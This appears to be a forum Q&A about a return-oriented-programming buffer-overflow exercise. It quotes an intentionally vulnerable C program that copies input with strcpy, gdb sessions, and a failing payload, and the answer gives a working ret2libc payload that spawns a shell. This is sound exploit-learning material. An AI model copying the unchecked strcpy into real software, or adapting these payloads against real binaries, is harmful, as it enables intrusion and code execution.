# ROP Buffer Overflow Exercise Issues

Tags: c, assembly, x86, gdb, buffer-overflow

I'm doing [this](http://codearcana.com/posts/2013/05/28/introduction-to-return-oriented-programming-rop.html) buffer overflow exercise and I can't seem to get it to work...

Under the **Calling Arguments** section of the article he exploits this program to use the variable `not_used` instead of `/bin/date`:

```
char* not_used = "/bin/sh";

void not_called() {
    printf("Not quite a shell...\n");
    system("/bin/date");
}

void vulnerable_function(char* string) {
    char buffer[100];
    strcpy(buffer, string);
}

int main(int argc, char** argv) {
    vulnerable_function(argv[1]);
    return 0;
}
```

He does this by getting `not_used` and the `system@plt` memory addresses, then replacing the stack with them:

```
| 0x8048580 <not_used>             |
| 0x43434343 <fake return address> |
| 0x8048360 <address of system>    |
| 0x42424242 <fake old %ebp>       |
| 0x41414141 ...                   |
|   ... (0x6c bytes of 'A's)       |
|   ... 0x41414141                 |
```

However, when I tried to do this, I just get a `Segmentation Fault`:

```
frinto@kali:~/Documents/theclang/programs/rop/argrop$ gdb -q a.out
Reading symbols from a.out...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x122e
(gdb) run
Starting program: /home/frinto/Documents/theclang/programs/rop/argrop/a.out 

Breakpoint 1, 0x5655622e in main ()
(gdb) print 'system@plt'
$1 = {<text variable, no debug info>} 0x56556050 <system@plt>
(gdb) x/s (int)not_used
0x56557008: "/bin/sh"
(gdb)
```

Then I built my payload and ran it:

```
frinto@kali:~/Documents/theclang/programs/rop/argrop$ ./a.out "$(python -c 'print "A"*0x6c + "BBBB" + "\x50\x60\x55\x56" + "CCCC" + "\x08\x70\x55\x56"')"
Segmentation fault
```

What could the issue be here? Thanks in advance for any help!

*P.S. Memory randomization is disabled*

Comment: It is *exceedingly* likely that your `disas main` differs from the tutorial, and thus you need to adjust your `argv[1]` payload (for one thing, you've built a PIE binary whereas the tutorial didn't). Adding `-fno-PIE -no-pie` when compiling and linking may help.

Answer (score 0):

If `NX` and `ASLR` is disabled, just do `ret2libc`, don't direct it to function `not_called()`

I found the string address of the `not_used` variable using IDA Pro :

1. String `/bin/sh` address = `0x08048530`
2. `system()` address = `0xb7e36da0`
3. Fake address = `JUNK`

Exploit :

```
`python -c 'print "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+"\xa0\x6d\xe3\xb7"+"JUNK"+"\x30\x85\x04\x08"'`
```

PoC :

```
% ./vulnerable `python -c 'print "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+"\xa0\x6d\xe3\xb7"+"JUNK"+"\x30\x85\x04\x08"'`
$
```